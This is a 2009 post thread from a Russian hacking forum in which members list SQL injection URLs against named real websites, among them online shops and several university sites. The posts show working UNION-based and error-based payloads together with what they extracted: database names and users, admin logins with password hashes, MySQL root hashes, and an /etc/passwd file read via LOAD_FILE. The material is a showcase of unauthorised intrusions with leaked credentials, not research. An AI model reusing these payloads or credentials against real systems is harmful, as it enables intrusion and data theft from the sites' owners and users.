HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.03.2009, 01:52
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию

threeoneg.com

Database Version: 5.0.45
Database name: threeone_catalog
User name: threeone_catalog@localhost

Код:
http://www.threeoneg.com/31G/shop.php?action=view&id=-17+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9

ravenfiles.com

Database Version: 4.1.22-standard
Database name: rgnmain1_ravenfiles
User name: rgnmain1_admin@localhost


Код:
http://www.ravenfiles.com/file.php?id=-14+union+Select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,0,11
expovest.ro

Database Version: 4.1.22-log
Database name: db16796
User name: u16796@81.28.232.69

Код:
http://www.expovest.ro/general_en/news.php?id=-173+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(user(),0x3a,version(),0x3a,database())

businessmachine.ro

Database Version: 5.0.45
Database name: bm
User name: bmadm@localhost

Код:
http://www.businessmachine.ro/afaceri/news.php?id=-51+union+select+1,concat(username,0x3a,userpass),3,4,5+from+users
gts-automatizari.ro

P.S: admin:21232f297a57a5a743894a0e4 (какой тип хэша?)

Database Version: 5.0.67-community-log
Database name: gtsautom_web
User name: gtsautom_web@localhost

Код:
http://www.gts-automatizari.ro/industrial-automation/news.php?lg=1&id=-51+union+select+1,2,3,4,concat(user,0x3a,passwd),6,concat(user,0x3a,passwd),8,9,0,1,2,3+from+gts_admin
 
Ответить с цитированием

  #2  
Старый 25.03.2009, 02:25
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами: 9081715

Репутация: 10
По умолчанию

Код:
http://www.mairie-yako.bf/site/suite.php?id=-101+union+select+1,2,version(),table_name,5+from+information_schema.tables--
Код:
http://www.lovea2.com/php/tourguide.php?id=-6+union+select+1,version(),3--
 
Ответить с цитированием

  #3  
Старый 25.03.2009, 05:42
nazgul_mk
Новичок
Регистрация: 06.07.2008
Сообщений: 12
С нами: 9394152

Репутация: 1
По умолчанию

SlavutichCity.net
PHP код:
http://slavutichcity.net/modules.php?op=modload&name=Subjects&file=index&req=listpages&subid=-1+union+select+1,concat(database(),0x3a,version(),0x3a,user()),3/* 
database(): slavutic_postnuke
version(): 4.1.22-standard
user(): slavutic_pnuker@localhost

ADMIN:
PHP код:
Boroda:gjhnfk 
 
Ответить с цитированием

  #4  
Старый 25.03.2009, 17:23
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами: 9644530

Репутация: 443
По умолчанию

Во как!


PageRank - 8


Цитата:
http://www.osu.edu/news/newsitem23798698757/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database()),4, 5,6,7,8,9,10,11,12,13,14,15,16--

Database Version: 5.0.27-log
Database name: news_db
User name: ted@www5.it.ohio-state.edu




Цитата:
http://www.osu.edu/news/newsitem23798698757/**/union/**/select/**/1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10,1 1,12,13,14,15,16/**/from/**/mysql.user--


: localhost : root : *C5FA920219C3170214E8A086CC776FAB477B1A8A : Y
: 128.146.216.181 : root :*C5FA920219C3170214E8A086CC776FAB477B1A8A : Y
: 128.146.216.88 : root :*C5FA920219C3170214E8A086CC776FAB477B1A8A : Y
: % : ted : 625b56912caa4d12 : Y
: % : ds0migr : 646fe4840b38d1d0 : Y
: 128.146.% : replication : *CF8D157B64E2424E308A4724ABAECBF189EE1B2D : N



Читаем etc/passwd



Цитата:
http://www.osu.edu/news/newsitem23798698757/**/UNION/**/SELECT/**/1,2,CONCAT(0x3a,LOAD_FILE(0x2F6574632F706173737764 ),0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16--



Код:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
spot:x:500:500:NISS spot account:/home/spot:/bin/bash
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
oracle:x:501:501::/usr/local/oracle:/bin/bash
mysql:x:101:101::/home/mysql:/bin/bash
zabbix:x:60:60::/tmp:/sbin/nologin
 
Ответить с цитированием

  #5  
Старый 25.03.2009, 11:18
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами: 9838057

Репутация: 302
По умолчанию

Код:
http://www.globaltown.ru
PR:1

Version: 5.0.67
Код:
http://www.globaltown.ru/vip.php?id=99999999999999%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
 
Ответить с цитированием

  #6  
Старый 25.03.2009, 17:25
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

http://www.alternativa3.com/2006/noticias.php?id=-690'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
 
Ответить с цитированием

  #7  
Старый 25.03.2009, 17:50
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Интернет-магазин светильников

Цитата:
http://isvet.ru/products.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--
Database Version: 4.1.11-Debian_4sarge5-log
Database name: z34890_isvet
User name: z34890_isvet@77.221.130.6

Login: silsergey
Pass: 8e4e4aae7d65051f3424b4fba909a00f : cgiperl
 
Ответить с цитированием

  #8  
Старый 25.03.2009, 18:15
Driver
Познающий
Регистрация: 06.07.2006
Сообщений: 87
С нами: 10446840

Репутация: 33
По умолчанию

PR: 6
тИЦ: 850
Код:
http://yspu.yar.ru/service/dissert/?_mode=3&idDis=-1+UNION+SELECT+1,2,convert(concat_ws(0x3a,+user(),+version(),+database())+using+cp1251),4,5,6,7,8,9,10,11,12,13,14/*
User name: dissert@localhost
Database version: 4.1.14-log
Database name: Dissert

Последний раз редактировалось Driver; 25.03.2009 в 18:34..
 
Ответить с цитированием

  #9  
Старый 25.03.2009, 20:29
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами: 9644530

Репутация: 443
По умолчанию

PR - 6


Цитата:
http://www.rlc.edu/pressroom/newsstory.php?id=902'%20and%20@@version%3E1--%20and%20'1'='1

Version : Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


Цитата:
http://www.rlc.edu/pressroom/newsstory.php?id=902'%20and%20db_name()%3E0--%20and%20'1'='1
Db Name : WebDB


Цитата:
http://www.rlc.edu/pressroom/newsstory.php?id=902'%20and%20user%3E0--%20and%20'1'='1
Current User : phpuser
 
Ответить с цитированием

  #10  
Старый 25.03.2009, 21:07
Driver
Познающий
Регистрация: 06.07.2006
Сообщений: 87
С нами: 10446840

Репутация: 33
По умолчанию

Код:
http://www.bspu.ru/index.php?module=Topics&func=view&topicid=-1+UNION+SELECT+1,pn_uname,pn_email,4,5,pn_pass+from+md_users+limit+1,1/*
Database version: 4.0.27-standard-log
Database name: bspu
User name: bspu@localhost
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.